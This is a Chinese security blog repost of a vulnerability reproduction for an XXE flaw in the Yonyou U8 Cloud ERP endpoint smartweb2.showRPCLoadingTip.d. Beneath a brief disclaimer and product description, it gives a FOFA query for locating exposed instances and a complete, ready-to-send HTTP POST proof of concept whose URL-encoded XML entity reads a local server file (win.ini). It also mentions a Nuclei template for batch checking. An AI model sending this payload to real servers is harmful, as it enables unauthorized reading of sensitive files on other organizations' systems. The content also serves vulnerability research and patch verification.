用友U8 Cloud smartweb2.showRPCLoadingTip.d XXE漏洞

admin 2024年6月28日15:28:15评论10 views字数 1555阅读5分11秒阅读模式
 

0x01 免责声明

免责声明

请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,作者不为此承担任何责任。工具来自网络,安全性自测,如有侵权请联系删除。本次测试仅供学习使用,如若非法他用,与平台和本文作者无关,需自行负责!!!

0x02

产品介绍

用友U8 Cloud 提供企业级云ERP整体解决方案,全面支持多组织业务协同,实现企业互联网资源连接。U8 Cloud 亦是亚太地区成长型企业最广泛采用的云解决方案。
0x03

漏洞威胁

用友U8 Cloud  smartweb2.showRPCLoadingTip.d 接口处存在XML实体,攻击者可通过该漏洞获取敏感文件信息,攻击者添加恶意内容,通过易受攻击的代码,就能够攻击包含缺陷的XML处理器。
0x04

漏洞环境

FOFA:

app="用友-U8-Cloud"

用友U8 Cloud smartweb2.showRPCLoadingTip.d XXE漏洞

0x05

漏洞复现

POC

POST /hrss/dorado/smartweb2.showRPCLoadingTip.d?skin=default&__rpc=true&windows=1 HTTP/1.1Host: your-ipUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 12_10) AppleWebKit/600.1.25 (KHTML, like Gecko) Version/12.0 Safari/1200.1.25Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3Accept-Language: zh-CN,zh;q=0.9Content-Type: application/x-www-form-urlencodedConnection: close__type=updateData&__viewInstanceId=nc.bs.hrss.rm.ResetPassword~nc.bs.hrss.rm.ResetPasswordViewModel&__xml=%3C%21DOCTYPE+z+%5B%3C%21ENTITY+test++SYSTEM+%22file%3A%2F%2F%2Fc%3A%2Fwindows%2Fwin.ini%22+%3E%5D%3E%3Crpc+transaction%3D%221%22+method%3D%22resetPwd%22%3E%3Cdef%3E%3Cdataset+type%3D%22Custom%22+id%3D%22dsResetPwd%22%3E%3Cf+name%3D%22user%22%3E%3C%2Ff%3E%3C%2Fdataset%3E%3C%2Fdef%3E%3Cdata%3E%3Crs+dataset%3D%22dsResetPwd%22%3E%3Cr+id%3D%221%22+state%3D%22insert%22%3E%3Cn%3E%3Cv%3E1%3C%2Fv%3E%3C%2Fn%3E%3C%2Fr%3E%3C%2Frs%3E%3C%2Fdata%3E%3Cvps%3E%3Cp+name%3D%22__profileKeys%22%3E%26test%3B%3C%2Fp%3E%3C%2Fvps%3E%3C%2Frpc%3E

读取 win.ini 配置文件

用友U8 Cloud smartweb2.showRPCLoadingTip.d XXE漏洞

0x06

批量脚本验证

Nuclei验证脚本已发布

原文始发于微信公众号(冷漠安全):「漏洞复现」用友U8 Cloud smartweb2.showRPCLoadingTip.d XXE漏洞

 

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年6月28日15:28:15
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   用友U8 Cloud smartweb2.showRPCLoadingTip.d XXE漏洞https://cn-sec.com/archives/2895889.html

发表评论

匿名网友 填写信息